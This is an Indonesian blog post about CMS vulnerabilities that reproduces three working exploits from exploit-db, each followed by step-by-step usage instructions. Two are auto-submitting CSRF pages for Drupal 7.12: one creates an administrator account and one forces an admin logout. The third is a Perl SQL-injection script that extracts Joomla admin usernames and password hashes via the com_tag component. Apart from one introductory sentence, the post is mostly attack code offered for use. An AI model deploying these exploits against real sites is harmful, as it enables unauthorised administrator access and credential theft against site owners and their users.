Seperti yang sudah diungkap sebelumnya, tidak ada suatu CMS yang sempurna dalam hal security nya, dapat dipastikan ada satu atau dua celah yang dapat ditembus. Berikut merupakan beberapa contoh vulnerabilities yang diungkap di exploit-db.com.
1. Drupal CMS 7.12
- Exploit (Add Administrator)
<html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit change user to admin</H2> <form method="POST" name="form0" action="http://<IP_TARGET>/drupal/admin/people/create?render=overlay&render=overlay"> <input type="hidden" name="name" value="new_admin"/> <input type="hidden" name="mail" value="ab@a.com"/> <input type="hidden" name="pass[pass1]" value="pass123"/> <input type="hidden" name="pass[pass2]" value="pass123"/> <input type="hidden" name="status" value="1"/> <input type="hidden" name="roles[3]" value="3"/> <input type="hidden" name="timezone" value="Asia/Jakarta"/> <input type="hidden" name="form_build_id" value="form-Aj18NNvRSPmhHJqC9KHYWlD5Fa4taVJbHoL2AmfmVcQ" /> <input type="hidden" name="form_token" value="BXyA8uNbxtYnrsnuzoQehnsEOqNz4ojwNz8j26idueA"/> <input type="hidden" name="form_id" value="user_register_form"/> <input type="hidden" name="op" value="Create new account"/> </form> </body> </html> |
Implementasi:
1. Simpan code pada file “test add admin.html”. |
| Code html untuk menambahkan user admin |
2. Buka file pada browser.
 |
| Pemanggilan code pada web browser |
3. User akan dibuat pada database.
 |
| User admin berhasil ditambahkan |
- Exploit (Force Logout)
<html> <body onload="javascript:document.forms[0].submit()"> <H2>CSRF Exploit to logout Admin</H2> <form method="POST" name="form0" action="http://<IP_TARGET>:80/drupal/user/logout"> </form> </body> </html> |
Implementasi:
1. Simpan code pada file “force log out.html”.
1. Simpan code pada file “force log out.html”.
 |
| Code HTML untuk melakukan force logout |
2. Panggil file yang sudah dibuat di webbrowser.
 |
| Pemanggilan code pada web browser |
3. User akan ter-logout.
 |
| User berhasil logout |
1.2. Joomla tag Remote Sql Exploit
Penulis: Daniel Barragan "D4NB4R"
#!/usr/bin/perl -w # Joomla Component (tag) Remote SQL Exploit #--------------------------------------------------------------# ######################################## print "\t\t\n\n"; print "\t\n"; print "\t Daniel Barragan D4NB4R \n"; print "\t \n"; print "\t Joomla com_tag Remote Sql Exploit \n"; print "\t\n\n"; use LWP::UserAgent; print "\nIngrese el Sitio:[http://wwww.site.com/path/]: "; chomp(my $target=<STDIN>); #the username of joomla $user="username"; #the pasword of joomla $pass="password"; #the tables of joomla $table="jos_users"; $d4n="com_tag&task"; $component="tag&lang=es"; $b = LWP::UserAgent->new() or die "Could not initialize browser\n"; $b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)'); $host = $target ."index.php?option=".$d4n."=".$component."&tag=999999.9' union all select 1,concat(0x3c757365723e,".$user.",0x3c757365723e3c706173733e,".$pass.",0x3c706173733e)+from ".$table."--+a"; $res = $b->request(HTTP::Request->new(GET=>$host)); $answer = $res->content; if ($answer =~ /<user>(.*?)<user>/){ print "\nLos Datos Extraidos son:\n"; print "\n * Admin User : $1"; } if ($answer =~/<pass>(.*?)<pass>/){ print "\n * Admin Hash : $1\n\n"; print "\t\t# El Exploit aporto usuario y password #\n\n";} else{ print "\n[-] Exploit Failed, Intente manualmente...\n"; } |
Implementasi:
1. Simpan file pada tag.sh
1. Simpan file pada tag.sh
 |
| Code program exploit |
2. Jalankan program/code di atas operating system linux (eksekusiperl application).
 |
| Menjalankan code |
3. Masukan alamat target.
 |
| Memasukan alamat target yang akan di cari passwordnya |
4. Password telah didapat, namun masih terenkripsi.
 |
| Hasil exploit com_tag |
Ichsan Bahri
I'm Ichsan. A full time web designer. I enjoy to make modern template. I love create blogger template and write about web design, blogger. Now I'm working with Themeforest. You can buy our templates from Themeforest.
Website: http://sagoe.net/
No Comment to " CMS Security: Celah Keamanan Pada CMS "